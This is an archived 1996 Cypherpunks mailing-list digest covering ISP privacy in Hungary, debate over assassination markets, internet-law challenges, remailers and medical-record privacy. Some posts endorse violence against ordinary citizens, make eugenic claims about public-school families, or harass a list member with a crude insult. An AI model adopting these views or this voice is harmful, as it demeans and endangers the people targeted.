Since everyone knows you > can download bomb-making instructions from the Internet, the police > figured they should investigate the local users. No, I'm not making > this up. > > What's more, nearly every local ISP gave the police this information. > Fortunately my company has no users in Esztergom and so that's what we > told the police. We got off lucky. Believe me, as much as might want > to make a stand for privacy of information my company is NOT eager to > do battle with the Hungarian authorities. > > But that's what it might take. Because if the Hungarian police really > understood the Internet they could have asked for even more. For > example, it would only take a few keystrokes to forward a users' mail > to the authorities. The police might also have asked for old email, > since many ISPs back this up routinely. > > But that's not all. Some ISPs run caching servers, machines that store > frequently-viewed webpages so that users access them locally rather > than across the net. An ISP's caching server could give the police a > profile of what web pages the users have been browsing. > > I'm not trying to scare anyone. My point is that sharing information > on the Internet is a two-way street. Computers keep extensive records. > Using the Internet often means you leave a trail behind you. This is > part of life in the digital age. > > This "electronic trail" is not unique to the Internet. Every time you > use a credit card you create a record in several computers. Other > computers may be storing information about you such as your medical > history, driving record, tax filings and so on. The more we rely on > computers to manage our affairs, the more information that may be "out > there." This means citizens in the digital age should know their > rights. > > Many governments already have laws to protect private information. For > example, the US has many laws restricting access to sensitive > information such as medical and credit records. 
You might be surprised > to know Hungary passed a law in 1991 to prevent misuse of information > associated with the national identity card. > > Yet the growth of new technologies is outpacing legislation. For > example, Holland and other countries are experimenting with "smart > road" systems that can identify the licence number of a moving car for > purposes of toll collection. Cellular phones and satellite navigation > systems can report the locations of their users. It's not difficult to > imagine how these and other technologies could be abused. > > Of course, now you know that even your local Internet provider has > access to some rather sensitive information about you. This leads me > to ask: what sort of service is your Internet provider actually > offering? > > When it comes down to it, your ISP is like your doctor, your lawyer, > your accountant or your psychiatrist. Each of these professionals > deals with your data; each profession is governed by a code of ethics, > written or implicit. Moreover these limits are codified in law. If > your accountant allowed your competitors to read the company books, > you could take him to court. > > Similarly, your Internet provider has an implicit duty to protect the > privacy of your communication. Most professionals in my industry > recognize this. I know most of the people working in Hungarian > Internet and I doubt very much that they are reading your mail or > mine. But they don't know where they stand in the eyes of the law. > > Internet professionals should certainly assist the police in a > legitimate investigation. But should every Internet user in Esztergom > be investigated just because they could (theoretically) find > bomb-making information on the Internet? > > To hammer that point home a local Internet-based magazine has > published, in Hungarian, complete bomb-making instructions: > . In other > words, if you've read this far you may be the subject of a future > investigation. Have a nice day! 
> > > > ** Further Links: > > The Electronic Frontier Foundation > > The International Electronic Rights Server > > The Electronic Privacy Information Center > > > ---------------------------------------------------- > Copyright (c) 1996. Permission granted to redistribute this article in > electronic form for non-profit purposes only. My byline and this message > must remain intact. Contact me for reprint rights. >----------------------------------------------------- > > > > > --- from Rodney Thayer +1 617 332 7292 --- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ To unsubscribe from this list, send a letter to: Majordomo at ai.mit.edu In the body of the message, write: unsubscribe dcsb Or, to subscribe, write: subscribe dcsb If you have questions, write to me at Owner-DCSB at ai.mit.edu --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ From dlv at bwalk.dm.com Tue Sep 24 18:48:13 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 25 Sep 1996 09:48:13 +0800 Subject: LACC: Re: Australia now has information police In-Reply-To: Message-ID: <4DuRuD1w165w@bwalk.dm.com> s1113645 at tesla.cc.uottawa.ca writes: > > > On Sun, 22 Sep 1996, Julian Assange wrote: > > > [re COCOM trade agreements] > > > > All COCOM countries most likely. That said Australia does not seem to be > > Didn't the COCOM treaty expire? No; rather the COCOM members had a meeting and voted to dissolve it. It happened some time around 1992 or 93, I think. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From attila at primenet.com Tue Sep 24 19:05:43 1996 From: attila at primenet.com (attila) Date: Wed, 25 Sep 1996 10:05:43 +0800 Subject: SAY WHAT? 
[Hallam-Baker demands more repudiations or he'll write!] In-Reply-To: Message-ID: <199609242306.RAA23971@InfoWest.COM> In , on 09/24/96 at 03:19 PM, Simon Spero said: = .On Tue, 24 Sep 1996, attila wrote: = .> = .> go back to your beloved England and your labour unions = . your roots are showing :-) ----^ REALLY? = .> NO, I will not outright reject Jim Bell's "Assassination = .> Politics." = .Assassination politics is impossible to defend from a classical = .Liberal/Libertarian position. Bell advocates arbitrary applications = .of violence and coercion without restriction. There is no way to = .justify the initiation of force without abandoning any pretence of = .being a Libertarian (which, to be fair, Bell doesn't claim to be). all very true. but I will defend Jim Bell's rights to propose them, even if Bell is more than a few cards short of a full deck. -- Politicians are like diapers. They both need changing regularly, and for the same reason. From guthery at snailbox.com Tue Sep 24 20:07:35 1996 From: guthery at snailbox.com (Scott Guthery) Date: Wed, 25 Sep 1996 11:07:35 +0800 Subject: Tamper-Resistant Software from INTEL Message-ID: <199609242330.SAA16789@oak.zilker.net> Has anybody heard of tamper-resistant software in general or a method for tamper-resistant software from Intel in particular? 
-*-*-*-*-*-*-*- http://www.snailbox.com -*-*-*-*-*-*-*- Scott Guthery Home: 1 512 266 1278 The SnailBox Work: 1 512 331 3774 12417 River Bend #6 FAX: 1 512 331 3059 Austin, Texas 78732 Email: guthery at snailbox.com From jfricker at vertexgroup.com Tue Sep 24 20:14:45 1996 From: jfricker at vertexgroup.com (John Fricker) Date: Wed, 25 Sep 1996 11:14:45 +0800 Subject: FLITE is now on the web Message-ID: <19960924225444242.AAA196@dev.vertexgroup.com> -----BEGIN PGP SIGNED MESSAGE----- http://www.fedworld.gov/supcourt/index.htm 7000 supreme court decisions from 1937 to 1975 -----BEGIN PGP SIGNATURE----- Version: 2.9 iQCVAgUBMkhnzbuA0owOB/fpAQEKWwQArJwMFrL5kVXSYfNC9I8T8bzi+8D8Zdma vZj84TB+2KmW28wuFvbxnVE02MT4DMkwTYR8NQpGfAxsHHkOCOzkasdVB1IRpnpP RUuZsyQ3Iabm3q7INywMcy+c+u+5bl6stzYAlKVypsmPYJh0J9TSnhH5zN+xdowG /6dj+90GGNc= =/4qd -----END PGP SIGNATURE----- From dlv at bwalk.dm.com Tue Sep 24 20:18:47 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 25 Sep 1996 11:18:47 +0800 Subject: AP In-Reply-To: <9609241952.aa26911@salmon.maths.tcd.ie> Message-ID: Derek Bell writes: > In message <6XJquD10w165w at bwalk.dm.com>, "Dr.Dimitri Vulis KOTM" writes: > >There is no such thing as an "ordinary citizen". When the U.S. commits > >war crimes in Korea, Viet Nam, Grenada, Panama, Somalia, Iraq, and elsewhere > >every American taxpayer is an accomplice and a fair game. Likewise, any > >British subject is fair game for IRA's self-defense against centuries of > >British genocide and oppression. > > An odd attitude to take - personally, I only hold people responsible > for what they did, not what their government did. In Dimitri's scenario, > the IRA could justify killing any British citizen for the British government' > actions - even if that citizen _supported_ the IRA or agreed with its aims. Yes, I do. 
--- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From teddygee at visi.net Tue Sep 24 20:21:52 1996 From: teddygee at visi.net (Ted Garrett) Date: Wed, 25 Sep 1996 11:21:52 +0800 Subject: Anonymous remailer information In-Reply-To: <199609240502.AAA14766@radish.interlink-bbs.com> Message-ID: On Tue, 24 Sep 1996, Super User wrote: > Hello! > > Thank you for your interest in our anonymous service. We > believe our remailer to be the best on the 'Net. Wasn't aware I'd asked for any information regarding your 'anonymous' service. Whether you believe it to be the best on the net or not, I was completely unaware of its existence. > The service costs $5.00 a month and will allow you to send > mail anywhere on the internet with a false ("spoofed") return > address. THIS IS INTENDED FOR ENTERTAINMENT PURPOSES ONLY! Hmm... I've heard of remailers being run for legitimate reasons like protecting freedom of speech, allowing a means to disseminate information anonymously, and simply protecting the identity of the person sending the message, but never for ENTERTAINMENT PURPOSES ONLY... > Q: How does the service work? Ok, I'll bite.. > A: You simply send your letter to anon at interlink-bbs.com, > following the format which we will detail when you > subscribe, and your letter will be remailed with the new > return address. Don't I encrypt it first with the public key of your remailer? Otherwise, how can I instruct the mailer which next hops to make? And since I'm sending all this in the clear to your remailer, don't I end up being open for a man in the middle attack, traffic analysis, and just plain anybody with a sniffer on my ISPs terminal servers. > Q: Can I post to USENET with your remailer? > A: Yes, if you use a gateway. We will provide complete > instructions at your request (assuming you have an account). Ah, so I can post the hundreds of kiddie porn pics I have through your service and be moderately untraceable? 
> Q: Can I send files? > A: If you uuencode them first, yes. Well, naturally. Most mail systems on the internet have serious problems digesting binary objects. Oh, I guess you were expecting that I'd use the Microsoft Mailer... > Q: May I test your service for free? > A: No. Yet another question I didn't ask. > Q: Does anyone ever complain about receiving mail which > has been forwarded from InterLink? > A: Sometimes. What we do is we block the address of > the complainer so that no more mail may be forwarded to > that address. Sounds like a plan. Can I have my name removed from your unsolicited mailing list this way? When I start running a remailer service, I think I'll adopt that strategy, if possible. Of course, MY remailer will be a cypherpunks style remailer or a mixmaster. And it'll be free, too. Of course, people will need to know a little bit about crypto and privacy to use it... but hey, ya gotta keep out the riff-raff somehow. > Repeated complaints will result in your account being closed. > This has not been a problem in the past, however, perhaps > because no one knew to whom a complaint could be sent! Or perhaps because no one in their right minds believes your remailer to be anonymous. From hallam at ai.mit.edu Tue Sep 24 20:25:49 1996 From: hallam at ai.mit.edu (hallam at ai.mit.edu) Date: Wed, 25 Sep 1996 11:25:49 +0800 Subject: Fruitcake Politics cont. [Noise] Message-ID: <9609250011.AA24972@etna.ai.mit.edu> >You're wrong on at least three counts: I absolutely do claim to be a >libertarian, for one. And Mr Dupont claims to be the Dalai Lama... >Secondly, while I advocate a system which I call AP, >I do not "advocate" the MISUSE of that system for the act of attacking >people who have no initiated force or fraud. In the diatribe you proceed to spew forth you define "fraud" as tax collection. In other words you are calling for the murder of the members of the IRS. 
I don't consider your position to be distinguishable from that of the Oklahoma city bombers. Interestingly enough the paragraph that begins by claiming there are at least three points runs out of steam after only two. In fact it is not argued from a classical libertarian or liberal position as claimed. The classical liberal position is that there are no rights without law so AP is self contradictory. I consider the authority of Rawls and Cohen on this one somewhat more persuasive than Bell. Mills certainly argues from this position but I can't claim to have discussed it with Mills :-) I don't think that Nozick would accept the argument either. It is entirely from false analogies. In law the right of self defense is limited. You are not entitled to kill someone if you fear that they might tread on your toe. The force used has to be both necessary and commensurate. To argue that one is entitled to murder IRS agents because you disagree with the legitimacy of taxes is certainly not a liberal position. It also won't do to disown the consequences of the scheme. Of course it would be the perfect scheme for getting rid of unwanted spouses etc. Simply dismissing this as an "unfortunate" side effect is not credible. It's like Teller's scheme to build a second panama canal using A bombs, describing the radiation damage caused as an unfortunate side effect. Phill From camcc at abraxis.com Tue Sep 24 21:24:28 1996 From: camcc at abraxis.com (camcc at abraxis.com) Date: Wed, 25 Sep 1996 12:24:28 +0800 Subject: [EFG] Fwd: Ga. 
Internet Law Challenged Message-ID: <2.2.32.19960925010103.00679840@smtp1.abraxis.com> >X-Sender: smcclain at pop.atl.mindspring.com >Date: Tue, 24 Sep 1996 16:47:07 -0400 >To: efg-action at ninja.techwood.org >Reply-To: efg-action at ninja.techwood.org > >>From: AOLNewsProfiles at aol.net >>Date: 96-09-24 15:25:54 EDT >> >>.c The Associated Press >> ATLANTA (AP) -- The American Civil Liberties Union and computer >>activists filed suit Tuesday challenging a new Georgia law they >>contend restricts free speech in cyberspace. >> ``Fundamental civil liberties are as important in cyberspace as >>they are in traditional contexts,'' said Ann Beeson, an ACLU >>attorney who specializes in computer law. >> Plaintiffs in the suit filed in federal court also include state >>Rep. Mitch Kaye, R-Marietta, who fought the law's passage, and >>Electronic Frontiers Georgia, a computer liberties organization. >> The law took effect July 1. It bars computer users from falsely >>identifying themselves, a provision which critics contend makes it >>illegal to use pseudonyms in electronic messages sent by computer. >>Some computer services allow users to send messages that identify >>them only by a pseudonym or account number. >> The law also makes it a crime for someone to use a company's >>trademark or symbol without permission. Critics argue that could >>make criminals of Web page owners who have established links to >>help users move quickly from their pages to those of corporate >>America. >> Robert Costner of Electronic Frontiers Georgia said that aspect >>of the law could subject his own group to penalties because its Web >>page provides a link to BellSouth's page to assist computer users >>in contacting the company about a recent rate increase. >> Rep. Don Parsons, R-Marietta, who steered the law to passage, >>has said critics are overreacting. >> The law only makes it illegal for a person to misrepresent >>himself on the network, posing as someone or something else, he >>noted. 
>> ``If somebody uses that type of data, such as a trade name, to >>identify themselves as some other organization, then they clearly >>are seeking to defraud,'' Parsons said last spring. >> Gov. Zell Miller signed the bill April 18 despite a warning from >>the attorney general that it was vague and a plea for a veto from >>the San Francisco-based Electronic Frontier Foundation, which >>called the measure an unconstitutional restraint on free speech >>rights. >> Ms. Beeson said the suit appears to be the first legal challenge >>in the country to an individual state's attempt to regulate the >>Internet. >> ``If 50 states pass 50 contradictory laws, Internet users will >>be virtually paralyzed for fear of violating one or more of those >>laws,'' she said. >> AP-NY-09-24-96 1523EDT >> Copyright 1996 The Associated Press. The information >>contained in the AP news report may not be published, >>broadcast, rewritten or otherwise distributed without >>prior written authority of The Associated Press. From jamesd at echeque.com Tue Sep 24 22:05:07 1996 From: jamesd at echeque.com (James A. Donald) Date: Wed, 25 Sep 1996 13:05:07 +0800 Subject: We removed radikal 154 from xs4all :( Message-ID: <199609242023.NAA10037@dns1.noc.best.net> At 09:28 AM 9/24/96 -0400, pjb at ny.ubs.com wrote: > i was under the impression that germany's goal was to stop the distribution > of radikal 154 by xs4all, not by 50 mirror sites. they seem to have > accomplished their goal. do you really think that they will let a little > thing like reason stand in their way when claiming victory? Your impression was wrong. Let us just run through the sequence of events. A bunch of leftover commies publish some boring commie crap in Germany, which probably most people would have ignored. Thugs with truncheons shut them up, making large numbers of "preventative" arrests. (A "preventative" arrest is when you have done nothing illegal, let alone wrong, but they arrest you anyway.) 
Result: big publicity on the internet, dead silence in the "free" german press. Germany tries to shut up the internet. Result: Even bigger publicity. Sounds like a defeat for Germany to me. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From jamesd at echeque.com Tue Sep 24 22:08:24 1996 From: jamesd at echeque.com (James A. Donald) Date: Wed, 25 Sep 1996 13:08:24 +0800 Subject: We removed radikal 154 from xs4all :( Message-ID: <199609242023.NAA10030@dns1.noc.best.net> At 05:32 PM 9/23/96 -0700, Timothy C. May wrote: > That xs4all eventually capitulated has to be seen as a win for Germany. That the net community did not capitulate has to be seen as a loss for Germany. > They will probably now turn their sights on other sites (no pun intended), > hoping to pick off each one in turn. If they do, it will make The church of scientology look like a minor squabble. Every time one site capitulates, it will inspire two dozen others to join the fray. I joined the fight *because* xs4all had to capitulate. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From dlv at bwalk.dm.com Tue Sep 24 22:09:51 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 25 Sep 1996 13:09:51 +0800 Subject: Public Schools In-Reply-To: Message-ID: <20uRuD1w165w@bwalk.dm.com> Phil Fraering writes: > On Mon, 23 Sep 1996, Dr.Dimitri Vulis KOTM wrote: > > > > > U.S. public school system is darwinian evolution in action. 
Parents who can > > afford to send their kids to private schools, do so. Parents who send their > > kids to public schools deserve to have their offspring fucked up, mentally > > and physically, to improve the species' gene pool. > > But the cutoff is often whether the parents can afford to send their kids > to private school, not whether or not they're genetically superior. You must have attended a public school if you don't understand that genetic superiority leads to economic success. My older kid goes to a private school. The parents are obviously genetically superior to public school parents. > And the reason it costs so much to send a kid to private school is that > everyone's already paying for a more expensive public school thanks to all > the taxes. Push vouchers. What's the cryptorelevance of your comments, anyway? > > There are plenty of excellent private elementary and secondary schools in t > > U.S. Children who deserve better schooling (by virtue of having parents who > > have better genes and are therefore economically successful) get it. > > So if I'm economically successful it'll change my genes? > > I guess this is the famous Russian belief in Lamarckianism in action. No, on the contrary, sending poor kids to good schools on scholarships does not improve their genes. They tend to become drug dealers. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From tcmay at got.net Tue Sep 24 22:19:02 1996 From: tcmay at got.net (Timothy C. May) Date: Wed, 25 Sep 1996 13:19:02 +0800 Subject: Medical Data Message-ID: In the public discussions about "medical data bases" and "medical account numbers," the key issue is being missed. Namely, Why can't patients carry their _own_ medical records, and disclose what they wish to disclose to doctors and hospitals, as they see fit? 
Whether implemented in a high-tech version, as a "smart card," or a low-tech version, as a "dossier" (a file folder), the principle's the same. (I'll get to insurance companies in a moment.)

There is little incentive (*) that I can imagine for any patient to deliberately lie on his records, as such lying usually harms himself by providing misleading information to someone who is trying to help him--I mention this because presumably one of the reasons hospitals and whatnot keep the records is fear that the records will be altered or not fully reported.

Medical records appear to be a perfect example of Chaum's "selective disclosure of credentials," or even "credentials without identity."

(* There is of course some incentive to lie or withhold medical information if the patient deems it invasive of his privacy, or something that he does not want on records accessible to others. But in a _specific medical treatment_, for example, he gains little by denying that he had measles as a child, or that he has used IV drugs. Provided he can disclose this information without being added to a data base--e.g., by using selective disclosure of information (and not his name)--the incentives for lying are small, possibly negative.)

Insurers would of course be worried about falsification of records. This can be handled in several ways. Digitally-signed statements from hospitals or test services could be required, depending on the policies of the insurers--the holder of the files, such as the patient, would be unable to fake or alter such records.

Still, when one asks another party to make a "bet" about one's health, which is what insurance of course is, it's not surprising that they would want to see to independent verification of one's assertions. This is largely separable from the issue of disclosing to doctors and hospitals medical information.

The comparison that is often made between credit records and medical records is flawed.
Credit records are the items of data _from other people_, e.g., the persons one has borrowed from, the landlords one has rented from, etc. And with credit records, a person is often inclined to falsify or withhold items (though this is also solved partly with digital signatures, though not perfectly).

(There are some interesting links with object-oriented programming, with patient-objects able to maintain their own state. Not true of creditee-objects, who are not the owners of the credit worthiness judgments of others.)

This could be an area where actual progress can be made. While many people, and regulators, have concerns about untraceable digital cash, it is likely that the _public_ would find it hard to buy the argument that patients being responsible for their own medical records would be a dire threat to the Republic!

Thus, while carrying one's own credit record is mostly unworkable, carrying one's own medical records is completely feasible, and solves many privacy problems.

--Tim May

(I hope I fixed any scrambled paragraphs...my Mac crashed again (it's been crashing several times a day, what with all the various semi-incompatible versions of the Mac OS, extensions, new programs, etc., I have) and I had to recover the text of what I'd been typing from one of those dreaded--but very useful--"keystroke capture" programs.)

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."
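The patient-held, hospital-signed record with selective disclosure described in the message above can be sketched as follows (an added example, not part of the original post). It assumes one salted-hash commitment per field and a Lamport one-time signature as a stand-in for the hospital's signature scheme; it is not Chaum's credential protocol, and the field names and values are constructed.

```python
import hashlib
import hmac
import json
import secrets


def H(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()


# Lamport one-time signature: a stand-in (assumption) for the hospital's real
# signature scheme. One key pair must sign exactly one record.
def lamport_keygen():
    sk = [(secrets.token_bytes(32), secrets.token_bytes(32)) for _ in range(256)]
    pk = [(H(a), H(b)) for a, b in sk]
    return sk, pk


def _digest_bits(msg: bytes):
    d = H(msg)
    return [(d[i // 8] >> (7 - i % 8)) & 1 for i in range(256)]


def lamport_sign(sk, msg: bytes):
    # Reveal one of the two secrets per digest bit.
    return [sk[i][bit] for i, bit in enumerate(_digest_bits(msg))]


def lamport_verify(pk, msg: bytes, sig) -> bool:
    bits = _digest_bits(msg)
    if len(sig) != len(bits):
        return False
    return all(hmac.compare_digest(H(s), pk[i][b])
               for i, (s, b) in enumerate(zip(sig, bits)))


def commit(field: str, value, salt: bytes) -> bytes:
    """Salted commitment: hides the value until the salt is revealed."""
    return H(json.dumps([field, value, salt.hex()]).encode())


def issue(sk, record: dict) -> dict:
    """Hospital: commit to every field, then sign the sorted commitment list."""
    salts = {f: secrets.token_bytes(16) for f in record}
    commitments = sorted(commit(f, v, salts[f]) for f, v in record.items())
    return {"record": dict(record), "salts": salts,
            "commitments": commitments,
            "sig": lamport_sign(sk, b"".join(commitments))}


def disclose(credential: dict, fields) -> dict:
    """Patient: reveal only the chosen fields; the rest stay as opaque hashes."""
    return {"revealed": {f: (credential["record"][f], credential["salts"][f])
                         for f in fields},
            "commitments": list(credential["commitments"]),
            "sig": credential["sig"]}


def verify(pk, presentation: dict):
    """Doctor or insurer: return the verified fields, or None if a check fails."""
    commitments = presentation["commitments"]
    if not lamport_verify(pk, b"".join(commitments), presentation["sig"]):
        return None  # commitment list was not signed by this hospital key
    verified = {}
    for field, (value, salt) in presentation["revealed"].items():
        if commit(field, value, salt) not in commitments:
            return None  # value or salt was altered after signing
        verified[field] = value
    return verified


if __name__ == "__main__":
    sk, pk = lamport_keygen()
    # Constructed sample record.
    cred = issue(sk, {"name": "Pat Example", "measles_as_child": True,
                      "iv_drug_use": False, "blood_type": "O+"})
    shown = disclose(cred, ["measles_as_child", "blood_type"])
    print(verify(pk, shown))
```

Because the same commitment list and signature are shown every time, two presentations of one credential can be linked to each other; blind-signature credentials of the kind Chaum proposed are designed to avoid that.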
From rpandya at netcom.com Tue Sep 24 22:21:17 1996
From: rpandya at netcom.com (Ravi Pandya)
Date: Wed, 25 Sep 1996 13:21:17 +0800
Subject: Private Information Retrieval
Message-ID: <2.2.32.19960924222443.006964e8@netcom7.netcom.com>

This work looks like it might be of interest to readers of this list.

Ravi

---
On Tue, 24 Sep 1996 14:52:08 -0700 (PDT) Scott Dakins wrote:

UNIVERSITY OF WASHINGTON
Seattle, Washington 98195
Department of Computer Science and Engineering
Box 352350 (206) 543-1695

COLLOQUIUM

SPEAKER: Benny Chor, Technion, Haifa, Israel
TITLE: Private Information Retrieval
DATE: Wednesday, September 25, 1996
TIME: 3:30 pm
PLACE: 422 Sieg Hall
HOST: Richard Karp

ABSTRACT:

Publicly accessible databases are an indispensable resource for retrieving up to date information. But they also pose a significant risk to the privacy of the user, since a curious database operator can follow the user's queries and infer what the user is after. Indeed, in cases where the users' intentions are to be kept secret, users are often cautious about accessing the database. It can be shown that when accessing a single database, to completely guarantee the privacy of the user, the whole database should be downloaded, namely $n$ bits should be communicated (where $n$ is the number of bits in the database).

In this work, we investigate whether by replicating the database, more efficient solutions to the private retrieval problem can be obtained. We describe schemes that enable a user to access $k$ replicated copies of a database ($k\geq 2$) and privately retrieve information stored in the database. This means that each individual database gets no information on the identity of the item retrieved by the user. These schemes use the replication to gain substantial saving.

In the talk, I will describe the original work on this topic (joint work with Oded Goldreich, Eyal Kushilevitz, and Madhu Sudan), as well as recent developments in this area.

Refreshments to follow.
Email: talk-info at cs.washington.edu
Info: http://www.cs.washington.edu

---------------End of Original Message-----------------

From declan at eff.org Tue Sep 24 22:21:59 1996
From: declan at eff.org (Declan McCullagh)
Date: Wed, 25 Sep 1996 13:21:59 +0800
Subject: SAY WHAT? [Hallam-Baker demands more repudiations or he'll write!]
In-Reply-To:
Message-ID:

Libertarian philosophy is, however, sympathetic to vigilantism.

True libertarians might characterize AP-type schemes as allowing two forms of action: just assassination (Hitler, Stalin) and unjust murder (most everyone else).

But reasonable libertarians will probably disagree where lines should be drawn.

-Declan

On Tue, 24 Sep 1996, Simon Spero wrote:

> On Tue, 24 Sep 1996, attila wrote:
>
> >
> > go back to your beloved England and your labour unions
> your roots are showing :-) ----^
>
> > NO, I will not outright reject Jim Bell's "Assassination
> > Politics."
>
> Assassination politics is impossible to defend from a classical
> Liberal/Libertarian position. Bell advocates arbitrary applications of
> violence and coercion without restriction. There is no way to justify the
> initiation of force without abandoning any pretence of being a
> Libertarian (which, to be fair, Bell doesn't claim to be).
>

// declan at eff.org // I do not represent the EFF // declan at well.com //

From gt4436c at prism.gatech.edu Tue Sep 24 22:25:14 1996
From: gt4436c at prism.gatech.edu (Jeremy Mineweaser)
Date: Wed, 25 Sep 1996 13:25:14 +0800
Subject: WHO IS MAKING A MOCKERY OF WHOM?
Message-ID: <3.0b19.32.19960924175545.009af9c0@50h97.res.gatech.edu>

At 06:15 AM 9/24/96 -0700, Sandy Sandfort wrote:
>C'punks,
>Time for another informal poll.
>
>On Mon, 23 Sep 1996, John Anonymous MacDonald wrote:
>> What a joy to make a public mockery of Tim Mayo!
>
>Do list members think Anonymous' posts make a public mockery of
>Tim May or Anonymous? Let me know whose reputation you think
>is enhanced or tarnished by these posts.
I'll post a summary to >the list in a week or two. First, to answer your question, I think the posts tarnish the reputation of Anonymous, although there never was much reputation to begin with. I am of the opinion that a positive reputation is earned, not given, and arguing over the matter at hand certainly doesn't help build a positive reputation. Since these annoying posts started a week or so ago, I have (for the first time ever) begun killfiling people and messages on the cp list. Right now I am killing all messages from John Anonymous MacDonald, Dmitri Vulis, and any message in the "daily ... regarding TCM" thread(s). I hope this madness can end, so we can get back to more normal traffic levels on the list. If anything good can come of this, it's that more people (myself included) will begin to use filtering tools to improve the perceived S/N ratio of the list. I am working on making a Eudora Pro plugin that creates and maintains a reputation system, which can then be tailored to modify incoming mail as desired, removing irrelevant paragraphs, summarizing, all kinds of things. Initially it will just keep an index score for each user representing the quality of the content which they author, but I have lots of things I hope to add to it. Good luck with the survey, Jeremy --- Jeremy L. Mineweaser | GCS/E d->-- s:- a--- C++(+++)$ ULC++(++++)>$ P+>++$ gt4436c at prism.gatech.edu | L+>++ E-(---) W++ N+ !o-- K+>++ w+(++++) O- M-- | V-(--) PS+(--) PE++ Y++>$ PGP++>+++$ t+() 5 X+ R+() *ai*vr*vx*crypto* | tv(+) b++>+++ DI+(++) D+ G++ e>+++ h-() r-@ !y- From nobody at zifi.genetics.utah.edu Tue Sep 24 22:30:20 1996 From: nobody at zifi.genetics.utah.edu (Anonymous) Date: Wed, 25 Sep 1996 13:30:20 +0800 Subject: The daily word of caution regarding Timmy May Message-ID: <199609242059.OAA27794@zifi.genetics.utah.edu> Timmy May studied yoga back-streching exercises for five years so he could blow himself (nobody else will). 
From tcmay at got.net Tue Sep 24 22:37:01 1996
From: tcmay at got.net (Timothy C. May)
Date: Wed, 25 Sep 1996 13:37:01 +0800
Subject: Portal remailer shutting down
Message-ID:

At 7:03 PM 9/24/96, Hal wrote:
>The ISP which I have used for over five years, portal.com, is going
>out of business at the end of this month (September, 1996). This means
>that my remailer at hfinney at shell.portal.com will cease operations.
>I had asked that it be removed from the remailer lists a few weeks ago
>due to some problems, so hopefully not many people have been using it
>lately. But now it will go away for good.
>
>This remailer has been in operation since the fall of 1991. I believe it
                                               ^^^^^^^^^^^^

You obviously mean "fall of 1992."

Anyway, congratulations on all of your work back then (in 1992 :-)), and for running it for so long.

I, too, was a Portalite, from 1988-1992 (when I switched to Netcom, which offered a local POP (point of presence) in Santa Cruz). Portal was the first major ISP to offer accounts to non-academic users. They were also heavily used by those who'd signed up with "PC-Pursuit," a flat-rate phone service which made it feasible to dial-in to Portal from anywhere in the country. When the plug was pulled on PC-Pursuit, circa mid-89, the prospects for Portal dimmed as well.

(My own usage dropped dramatically when PC-Pursuit was canned, as dialing-in to Portal directly was costing me $6-10 an hour, depending on the time of day. Once I got on with Netcom, in 1992, I was able to join various mailing lists, including the Extropians list and of course the Cypherpunks list.)

I haven't been following the fortunes of Portal for a couple of years, but its relative absence from the playing field of Netcom, Best, Earthlink, etc. has been pretty noticeable. So I can't say I'm surprised it's going away.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C.
May | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From rah at shipwright.com Tue Sep 24 22:53:01 1996
From: rah at shipwright.com (Robert Hettinga)
Date: Wed, 25 Sep 1996 13:53:01 +0800
Subject: The Netsurfer of Penzance
Message-ID:

--- begin forwarded text

Priority: normal
Date: Tue, 24 Sep 1996 10:31:58 PST
Reply-To: Law & Policy of Computer Communications
Sender: Law & Policy of Computer Communications
From: Eugene Volokh
Organization: UCLA School of Law
Subject: The Netsurfer of Penzance
To: CYBERIA-L at LISTSERV.AOL.COM

------- Forwarded Message Follows -------
From: "Thomas P. Vogl"

The Newbie's Song
(Based on the Major General's song from "The Pirates of Penzance", Gilbert & Sullivan).

I am the very model of a Usenet individual,
I've information meaningless and ultimately trivial,
I know the basic elements of alien biology,
And all the hidden secrets of the Church of Scientology,
I've seen "The Wrath of Khan" and every Star Trek film that followed it,
I moan about my Servicecard and how the cash till swallowed it,
About the laws on handguns I am sending off a counterblast,
With many cheerful facts about the way you can MAKE MONEY FAST!

ALL: With many cheerful etc.

I'll tell you why the Japanese are taking over Panama,
And why the USA is still a better place than Canada,
In short, in matters meaningless and ultimately trivial,
I am the very model of a Usenet individual.

ALL: In short, in matters meaningless and ultimately trivial,
He is the very model of a Usenet individual.
I post in alt.revisionism lies about the Holocaust,
I cut my .sig to twenty lines, I didn't want to, I was forced,
I really can't believe the "Good Times" virus to be mythical,
And Clinton's raising taxes which is, frankly, bloody typical,
I've upset several people on alt.flame, I really don't know how,
